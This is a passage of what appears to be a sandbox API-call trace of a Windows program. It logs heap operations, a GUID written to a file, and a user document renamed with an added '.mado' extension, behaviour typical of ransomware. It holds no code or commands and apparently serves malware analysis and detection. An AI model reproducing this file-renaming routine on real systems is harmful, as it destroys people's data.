hHeap=0x2c0000) returned 1 [0205.169] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.169] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.169] CloseHandle (hObject=0x63c) returned 1 [0205.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b74e80 [0205.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0205.170] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\_Kde0C7n4syUZ.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\_kde0c7n4syuz.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\_Kde0C7n4syUZ.ots.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\_kde0c7n4syuz.ots.mado")) returned 1 [0205.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.171] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0205.172] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca071080, ftCreationTime.dwHighDateTime=0x1d5ddd9, ftLastAccessTime.dwLowDateTime=0x1df3ded0, ftLastAccessTime.dwHighDateTime=0x1d5e181, ftLastWriteTime.dwLowDateTime=0x1df3ded0, ftLastWriteTime.dwHighDateTime=0x1d5e181, nFileSizeHigh=0x0, nFileSizeLow=0x108b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kde0C7n4syUZ.ots", cAlternateFileName="_KDE0C~1.OTS")) returned 0 [0205.172] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0205.172] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0205.172] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 